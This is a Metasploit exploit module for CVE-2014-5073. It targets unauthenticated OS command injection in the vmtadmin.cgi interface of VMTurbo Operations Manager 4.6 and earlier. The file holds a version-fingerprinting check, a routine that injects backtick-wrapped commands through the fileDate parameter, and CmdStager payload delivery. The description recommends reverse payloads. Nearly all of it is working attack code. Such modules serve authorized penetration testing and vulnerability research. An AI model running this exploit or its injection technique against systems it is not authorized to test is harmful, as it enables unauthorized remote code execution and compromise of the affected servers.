GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/unix/http/vmturbo_vmtadmin_exec_noauth.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
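# Unauthenticated OS command injection in the vmtadmin.cgi web interface of
# VMTurbo Operations Manager (CVE-2014-5073, see 'References' below).
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager
  include Msf::Exploit::EXE

  # Shape of the body vmtadmin.cgi returns for callType=ACTION&actionType=VERSIONS,
  # e.g. (constructed sample) "vmtbuild:28000,vmtrelease:4.6,vmtbits:64,osbits:64".
  VERSION_RE = /vmtbuild:(?<build>\d+),vmtrelease:(?<version>[\d.]+),vmtbits:\d+,osbits:\d+/

  # Newest release that #check reports as vulnerable ('Description': 4.6 and prior).
  LAST_VULNERABLE_RELEASE = Gem::Version.new('4.6')

  # Build boundary used by #check: builds at or above it are reported Safe.
  # The number is carried over from the module's original comparison.
  PATCHED_BUILD = 28657

  # Registers module metadata and drops the CmdStager decoder/flavor options,
  # because #exploit hard-codes the printf flavor.
  #
  # @param info [Hash] metadata merged by the framework
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'VMTurbo Operations Manager vmtadmin.cgi Remote Command Execution',
      'Description' => %q{
        VMTurbo Operations Manager 4.6 and prior are vulnerable to unauthenticated
        OS Command injection in the web interface. Use reverse payloads for the most
        reliable results. Since it is a blind OS command injection vulnerability,
        there is no output for the executed command when using the cmd generic payload.
        Port binding payloads are disregarded due to the restrictive firewall settings.

        This module has been tested successfully on VMTurbo Operations Manager versions 4.5 and
        4.6.
      },
      'Author' =>
        [
          # Secunia Research - Discovery and Metasploit module
          'Emilio Pinna <emilio.pinn[at]gmail.com>'
        ],
      'License' => MSF_LICENSE,
      'References' =>
        [
          ['CVE', '2014-5073'],
          ['OSVDB', '109572'],
          ['URL', 'http://web.archive.org/web/20140905004331/http://secunia.com:80/secunia_research/2014-8/']
        ],
      'DisclosureDate' => '2014-06-25',
      'Privileged' => false,
      'Platform' => %w{ linux unix },
      'Payload' =>
        {
          'Compat' =>
            {
              'ConnectionType' => '-bind'
            }
        },
      'Targets' =>
        [
          [ 'Unix CMD',
            {
              'Arch' => ARCH_CMD,
              'Platform' => 'unix'
            }
          ],
          [ 'VMTurbo Operations Manager',
            {
              'Arch' => [ ARCH_X86, ARCH_X64 ],
              'Platform' => 'linux'
            }
          ],
        ],
      'DefaultTarget' => 1
    ))

    deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')
  end

  # Fingerprints the appliance through the VERSIONS action of vmtadmin.cgi and
  # compares the reported release and build numerically.
  #
  # The original module compared the captured strings lexically ("10.6" <= "4.6"
  # is true as strings, and "4.5" only happened to sort correctly), so the
  # release is parsed as a version and the build as an integer instead.
  #
  # @return [Msf::Exploit::CheckCode] Unknown when the server cannot be reached
  #   or the body is not recognized; Appears for a release <= 4.6 with a build
  #   below PATCHED_BUILD; Safe otherwise.
  def check
    begin
      res = send_request_cgi({
        'method' => 'GET',
        'uri' => '/cgi-bin/vmtadmin.cgi',
        'vars_get' => {
          'callType' => 'ACTION',
          'actionType' => 'VERSIONS'
        }
      })
    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
      vprint_error('Failed to connect to the web server')
      return Exploit::CheckCode::Unknown
    end

    match = res && res.code == 200 && VERSION_RE.match(res.body)
    unless match
      vprint_status('Unexpected vmtadmin.cgi response')
      return Exploit::CheckCode::Unknown
    end

    version = match[:version]
    build = match[:build]
    vprint_status("VMTurbo Operations Manager version #{version} build #{build} detected")

    # [\d.]+ can capture a malformed release such as "4.6." that Gem::Version
    # rejects; report Unknown rather than raising out of check.
    unless Gem::Version.correct?(version)
      vprint_status("Unparseable vmtrelease value #{version}")
      return Exploit::CheckCode::Unknown
    end

    if Gem::Version.new(version) <= LAST_VULNERABLE_RELEASE && build.to_i < PATCHED_BUILD
      Exploit::CheckCode::Appears
    else
      Exploit::CheckCode::Safe
    end
  end

  # Sends one command through the unauthenticated fileDate parameter of the
  # CFGBACKUP download action. The injection is blind: the response body does
  # not carry the command output.
  #
  # @param cmd [String] command to run on the appliance
  # @param opts [Hash] options handed over by the CmdStager mixin; unused here
  # @return [nil] when the web server cannot be reached. On the other path the
  #   method's value is whatever vprint_status returns; #exploit tests that
  #   value with `unless res`, so confirm it is truthy on success.
  def execute_command(cmd, opts)
    begin
      res = send_request_cgi({
        'uri' => '/cgi-bin/vmtadmin.cgi',
        'method' => 'GET',
        'vars_get' => {
          'callType' => 'DOWN',
          'actionType' => 'CFGBACKUP',
          'fileDate' => "\"`#{cmd}`\""
        }
      })
    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
      vprint_error('Failed to connect to the web server')
      return nil
    end

    vprint_status("Sent command #{cmd}")
  end

  # Module entry point. The 'Unix CMD' target sends the encoded payload in a
  # single request; the native target stages the payload through CmdStager
  # with the printf flavor (the FLAVOR option is deregistered in #initialize).
  def exploit
    if target.name.match?(/CMD/)
      res = execute_command(payload.encoded, {})
      fail_with(Failure::Unknown, "#{peer} - Unable to execute payload") unless res

      # Nothing comes back from the injected command, so success cannot be confirmed here.
      print_status("Blind Exploitation - unknown exploitation state")
      return
    end

    execute_cmdstager(flavor: :printf)
  end
end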